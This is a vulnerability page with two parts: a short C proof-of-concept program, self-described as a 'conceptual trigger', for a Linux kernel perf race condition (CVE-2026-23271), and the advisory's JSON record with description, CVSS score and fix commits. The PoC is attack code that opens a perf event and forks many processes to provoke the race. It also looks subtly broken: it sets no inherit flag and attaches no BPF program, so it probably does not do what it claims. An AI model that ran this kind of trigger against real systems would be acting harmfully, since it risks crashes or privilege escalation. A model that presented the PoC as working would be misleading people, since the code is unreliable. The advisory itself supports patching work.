CVE-2026-23271

/* * PoC for CVE-2026-23271 * This is a conceptual trigger to demonstrate the race condition. * It attempts to trigger the overflow while exiting context. */ #include <linux/perf_event.h> #include <sys/syscall.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { return syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); } int main() { struct perf_event_attr pe; int fd; memset(&pe, 0, sizeof(struct perf_event_attr)); pe.type = PERF_TYPE_SOFTWARE; pe.size = sizeof(struct perf_event_attr); pe.config = PERF_COUNT_SW_TASK_CLOCK; // High frequency to trigger overflow faster pe.sample_freq = 1000; pe.disabled = 0; pe.enable_on_exec = 0; fd = perf_event_open(&pe, 0, -1, -1, 0); if (fd == -1) { perror("perf_event_open"); exit(EXIT_FAILURE); } printf("Triggering race condition (CVE-2026-23271)..."); fflush(stdout); // Fork threads to increase contention between overflow and exit for (int i = 0; i < 100; i++) { if (fork() == 0) { // Child process: busy wait to generate events and exit volatile int x = 0; while(x < 100000) x++; _exit(0); } } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23271", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-20T09:16:11.773", "lastModified": "2026-04-02T15:16:28.190", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf: Fix __perf_event_overflow() vs perf_remove_from_context() race\n\nMake sure that __perf_event_overflow() runs with IRQs disabled for all\npossible callchains. Specifically the software events can end up running\nit with only preemption disabled.\n\nThis opens up a race vs perf_event_exit_event() and friends that will go\nand free various things the overflow path expects to be present, like\nthe BPF program."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nperf: Corrección de la condición de carrera entre __perf_event_overflow() y perf_remove_from_context()\n\nAsegurar que __perf_event_overflow() se ejecute con las IRQ deshabilitadas para todas las cadenas de llamadas posibles. Específicamente, los eventos de software pueden terminar ejecutándolo con solo la preemption deshabilitada.\n\nEsto abre una condición de carrera frente a perf_event_exit_event() y funciones relacionadas que liberarán varias cosas que la ruta de desbordamiento espera que estén presentes, como el programa BPF."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/3f89b61dd504c5b6711de9759e053b082f9abf12", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4df1a45819e50993cb351682a6ae8e7ed2d233a0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/4f8d5812337871227bb2c98669a87c306a2f86ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/5c48fdc4b4623533d86e279f51531a7ba212eb87", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/bb190628fe5f2a73ba762a9972ba16c5e895f73e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/c9bc1753b3cc41d0e01fbca7f035258b5f4db0ae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}